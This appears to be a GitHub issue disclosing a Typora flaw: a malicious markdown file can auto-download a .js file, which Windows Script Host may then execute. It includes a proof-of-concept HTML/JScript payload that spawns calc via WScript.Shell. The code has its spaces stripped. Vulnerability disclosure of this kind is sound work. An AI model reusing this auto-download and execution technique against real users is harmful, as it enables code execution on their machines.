Although typora filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
<!-- auto download !--><html><script>varblob=newBlob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});vara=document.createElement('a');a.href=window.URL.createObjectURL(blob);a.download='poc.js';a.click();</script></html><!-- click to download !--><ahref="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
poc.js
varWshShell=newActiveXObject("WScript.Shell");varret=WshShell.run("calc");if(ret==0)WScript.Echo("You were hacked.")WScript.Quit();
The text was updated successfully, but these errors were encountered:
If you set WSH as default application for .js files, then when you click poc.js in File Explorer, the script will also be executed. Actually user should not set WSH as default application for .js files.
Description
Although typora filters most dangeruos suffix, it still retains the
.jsfile which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.Version: 0.9.78-1.5.5(latest)
Attachment
poc.md
poc.html
poc.js
The text was updated successfully, but these errors were encountered: